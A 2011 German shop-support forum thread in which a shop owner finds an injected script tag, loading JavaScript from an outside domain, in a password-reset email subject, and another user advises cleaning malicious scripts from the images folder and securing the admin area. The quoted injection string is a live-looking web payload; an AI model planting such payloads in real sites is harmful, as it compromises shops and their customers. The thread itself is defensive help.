Seite 1 von 1
Seltsame Scripte -->auch im Mail-Betreff
Verfasst: 13.09.2011, 18:47
von Maw.
Hallo,
habe scheinbar komische Scripte in meinem Shop. Beim "Passwort zurücksetzen"-Mail hatte ich heute folgenden Betreff:
Betreff: </title><script src=
http://orangeblue.cl/js/></script><title> - Ihr neues Passwort.
Wo such ich zuerst, um das rauszulöschen?
Auslöser war dieser, dass Bestellmails ohne Inhalte angekommen sind, nur die Mailadresse des Kunden (war ein echter Kunde) war im Mail als Absender, ansonsten leer.
Gruß Marc
Verfasst: 15.09.2011, 19:23
von r23
Hallo Marc.
hast du für den Admin - Bereich einen htaccess Verzeichnisschutz eingerichtet?
Du kannst mit einem normlen Editor z.b. mit netbeans
http://netbeans.org/
Scripte auf Inhalte durchsuchen.
Vermutlich wurden auch Scripte in dein Images Verzeichnis veröffentlicht.
~/images/*.*
Achte auch auf Verzeichnisnamen, die mit einem . (Punkt) beginnen.
Wenn du Hilfe für eine Shop- Säuberung benötigst? Wir können dir ab Freitag-Nachmittag ab ca. 15 Uhr helfen
FTP: Zugangsdaten an
info@r23.de
Preis: 45 Euro + MwSt.
Wir haben allerdings am Montag eine Veröffentlichung (!) können eigentlich erst am Dienstag...
Beste Grüße
ralf
Verfasst: 15.09.2011, 21:29
von Maw.
Hallo ralf,
admin war leider noch ungeschützt, hab ich jetzt per htaccess gemacht.
Im images-ordner waren einige faule Scripte die ich gelöscht habe und auch sonst hab ich Sachen entdecken können.
Jetzt wart ich mal eine Woche ab und komme dann gerne auf dein Angebot zurück, wenn sich wieder Probleme einschleichen!
Danke und schöne Grüße,
Marc
Verfasst: 15.09.2011, 23:53
von r23
Halle,
dein Problem sollte jetzt erledigt sein... du könntest noch das Verzeichnis
~/images/ so konfigureren, das dort keine PHP Scripte funktionieren.
Ab dem 27.09 bin ich für ein paar Tage bei einem Kunden in Berlin vor Ort...
Beste Grüße
ralf
Verfasst: 16.09.2011, 09:04
von Maw.
okay, danke, das werde ich noch googeln und dann auch so machen!
Dann viel Erfolg beim Kunden!
Schöne Grüße,
Marc